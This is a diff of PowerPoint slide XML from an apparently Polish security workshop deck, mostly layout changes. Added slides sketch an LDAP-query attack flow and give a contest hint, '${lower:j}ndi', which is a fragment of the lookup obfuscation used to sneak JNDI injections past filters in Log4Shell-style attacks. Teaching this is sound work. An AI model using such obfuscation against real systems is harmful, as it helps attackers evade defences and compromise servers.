+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1098208425"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
 <file path=ppt/notesSlides/notesSlide23.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 114"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="115" name="Google Shape;115;p7:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;p7:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3923626389"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide24.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2459,115 +2567,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627691602"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide24.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 114"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="115" name="Google Shape;115;p7:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="116" name="Google Shape;116;p7:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1098208425"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3751,7 +3750,7 @@
   <p:cSld>
     <p:spTree>
       <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 114"/>
+        <p:cNvPr id="1" name="Shape 84"/>
         <p:cNvGrpSpPr/>
         <p:nvPr/>
       </p:nvGrpSpPr>
@@ -3765,7 +3764,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="115" name="Google Shape;115;p7:notes"/>
+          <p:cNvPr id="85" name="Google Shape;85;p2:notes"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -3803,7 +3802,7 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="116" name="Google Shape;116;p7:notes"/>
+          <p:cNvPr id="86" name="Google Shape;86;p2:notes"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
           </p:cNvSpPr>
@@ -3845,7 +3844,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="797253937"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="992768704"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -14136,7 +14135,7 @@
     </p:bg>
     <p:spTree>
       <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 87"/>
+        <p:cNvPr id="1" name="Shape 117"/>
         <p:cNvGrpSpPr/>
         <p:nvPr/>
       </p:nvGrpSpPr>
@@ -14150,18 +14149,74 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="88" name="Google Shape;88;p2"/>
+          <p:cNvPr id="2" name="Rectangle 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA55744A-5B43-F84F-85B8-AB2DEB6E1AF1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10458450" y="5634990"/>
+            <a:ext cx="1733550" cy="1131570"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:schemeClr val="bg1"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="lt1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="dk1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Google Shape;124;p8">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475D5942-3965-6643-BFF1-4791FEC2E722}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="ctrTitle"/>
+            <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1524000" y="1122363"/>
-            <a:ext cx="9144000" cy="2387600"/>
+            <a:off x="2943225" y="365125"/>
+            <a:ext cx="8410574" cy="1325563"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -14172,7 +14227,7 @@
           </a:ln>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="b" anchorCtr="0">
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
             <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
@@ -14188,32 +14243,325 @@
                 <a:spcPts val="0"/>
               </a:spcAft>
               <a:buClr>
-                <a:schemeClr val="lt1"/>
+                <a:schemeClr val="dk1"/>
               </a:buClr>
               <a:buSzPts val="3800"/>
               <a:buFont typeface="Open Sans"/>
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
+              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>LDAP </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>query</a:t>
+            </a:r>
+            <a:endParaRPr sz="3800" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="Rectangle 9">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE519593-B5E7-0148-B0A0-EC5BFA26D409}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6875160" y="2450637"/>
+            <a:ext cx="956790" cy="1091527"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="14" name="Picture 8" descr="Animal, bug, insect, virus, virus bug icon icon - Download on Iconfinder">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3632450E-531B-554A-AE67-61F8107C4625}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="7029579" y="2672424"/>
+            <a:ext cx="647952" cy="647952"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:extLst>
+            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                 <a:solidFill>
-                  <a:schemeClr val="bg1"/>
+                  <a:srgbClr val="FFFFFF"/>
                 </a:solidFill>
-              </a:rPr>
-              <a:t>Demo #1</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              </a14:hiddenFill>
+            </a:ext>
+          </a:extLst>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Rectangle 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10ADDAD4-878F-9D4E-8339-1459176AE228}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3887713" y="2728818"/>
+            <a:ext cx="1429129" cy="535166"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-PL" dirty="0"/>
+              <a:t>request</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="Right Arrow 12">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CD9183E-25FB-684D-BBC2-C6B5392F8168}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5655958" y="2870368"/>
+            <a:ext cx="805398" cy="224058"/>
+          </a:xfrm>
+          <a:prstGeom prst="rightArrow">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="Right Arrow 16">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CCD499C-C168-A446-9BB7-9A1BB3D9DEC1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8151887" y="2870368"/>
+            <a:ext cx="805398" cy="224058"/>
+          </a:xfrm>
+          <a:prstGeom prst="rightArrow">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="19" name="Rectangle 18">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB01D1A-1331-C047-8730-8C81674D7309}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9256722" y="2672424"/>
+            <a:ext cx="1429129" cy="535166"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>L</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-PL" dirty="0"/>
+              <a:t>dap query</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272318865"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462084498"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -14907,7 +15255,7 @@
                 <a:cs typeface="Arial"/>
                 <a:sym typeface="Arial"/>
               </a:rPr>
-              <a:t> run –</a:t>
+              <a:t> run --</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="pl-PL" dirty="0" err="1">
@@ -15080,7 +15428,7 @@
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="228600" lvl="0" indent="-165100" algn="l" rtl="0">
+            <a:pPr marL="63500" lvl="0" indent="0" algn="l" rtl="0">
               <a:lnSpc>
                 <a:spcPct val="90000"/>
               </a:lnSpc>
@@ -15094,15 +15442,62 @@
                 <a:srgbClr val="292929"/>
               </a:buClr>
               <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
+              <a:buNone/>
             </a:pPr>
-            <a:endParaRPr dirty="0">
+            <a:endParaRPr lang="pl-PL" dirty="0">
               <a:solidFill>
                 <a:srgbClr val="292929"/>
               </a:solidFill>
               <a:latin typeface="Arial"/>
               <a:ea typeface="Arial"/>
+              <a:cs typeface="Arial"/>
+              <a:sym typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="63500" lvl="0" indent="0" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="292929"/>
+              </a:buClr>
+              <a:buSzPts val="1800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="292929"/>
+                </a:solidFill>
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+                <a:cs typeface="Arial"/>
+                <a:sym typeface="Arial"/>
+              </a:rPr>
+              <a:t>c</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-PL" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="292929"/>
+                </a:solidFill>
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+                <a:cs typeface="Arial"/>
+                <a:sym typeface="Arial"/>
+              </a:rPr>
+              <a:t>url localhost 8000</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="292929"/>
+              </a:solidFill>
+              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               <a:cs typeface="Arial"/>
               <a:sym typeface="Arial"/>
             </a:endParaRPr>
@@ -18415,7 +18810,7 @@
                 <a:cs typeface="Arial"/>
                 <a:sym typeface="Arial"/>
               </a:rPr>
-              <a:t> run –</a:t>
+              <a:t> run --</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="pl-PL" dirty="0" err="1">
@@ -18765,7 +19160,7 @@
                 <a:cs typeface="Open Sans"/>
                 <a:sym typeface="Open Sans"/>
               </a:rPr>
-              <a:t>Konkurs #1</a:t>
+              <a:t>Podpowiedź</a:t>
             </a:r>
             <a:endParaRPr sz="3800" dirty="0"/>
           </a:p>
@@ -18783,8 +19178,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2308860" y="1825625"/>
-            <a:ext cx="9795510" cy="4165600"/>
+            <a:off x="4497705" y="2639379"/>
+            <a:ext cx="2668906" cy="675321"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -18800,140 +19195,87 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="63500" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:schemeClr val="dk1"/>
+              </a:buClr>
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>${</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>lower:j</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>ndi</a:t>
+            </a:r>
+            <a:endParaRPr lang="pl-PL" dirty="0">
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:spcAft>
